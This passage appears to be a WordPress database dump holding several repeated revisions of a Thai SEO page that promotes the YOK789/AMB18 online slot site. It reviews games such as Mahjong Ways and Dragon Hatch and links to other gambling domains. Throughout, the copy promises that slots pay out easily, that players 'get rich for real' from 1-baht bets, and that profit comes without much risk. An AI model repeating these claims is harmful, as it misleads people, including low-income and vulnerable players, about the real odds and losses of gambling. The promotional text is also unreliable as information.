โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:08:41','2026-02-26 19:08:41','',44,'https://amb18slot.com/?p=374',0,'revision','',0),(375,3,'2026-02-26 19:08:42','2026-02-26 19:08:42','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:08:42','2026-02-26 19:08:42','',44,'https://amb18slot.com/?p=375',0,'revision','',0),(376,3,'2026-02-26 19:09:51','2026-02-26 19:09:51','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน 